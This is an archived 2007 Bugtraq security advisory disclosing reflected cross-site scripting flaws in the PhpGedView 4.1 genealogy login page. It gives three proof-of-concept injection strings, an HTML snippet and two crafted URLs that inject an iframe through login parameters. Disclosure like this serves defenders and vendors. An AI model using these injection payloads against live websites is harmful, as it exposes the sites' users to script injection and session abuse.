[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PhpGedView login page multiple XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PhpGedView login page multiple XSS
- From: morin.josh@xxxxxxxxx
- Date: 27 Aug 2007 21:22:51 -0000
Vendor Site: http://www.phpgedview.net
Version: 4.1
Common Path: yoursite.com/genealogy/login.php
Overview: Genealogy program which allows you to view and edit your genealogy on
your website. It fails to sufficiently sanitize user-supplied input data in
"User Name" text box leaving password blank and pressing the "Login" button,
also web address XSS.
Example:
1.<html><font color="Red"><b>XSS</b></font></html>
2.yoursite.com/genealogy/login.php?login.php?action=login&username="><iframe>
3.yousite.com/genealogy/login.php?url=/index.php?JOSH="><iframe>
Discovered by: Joshua Morin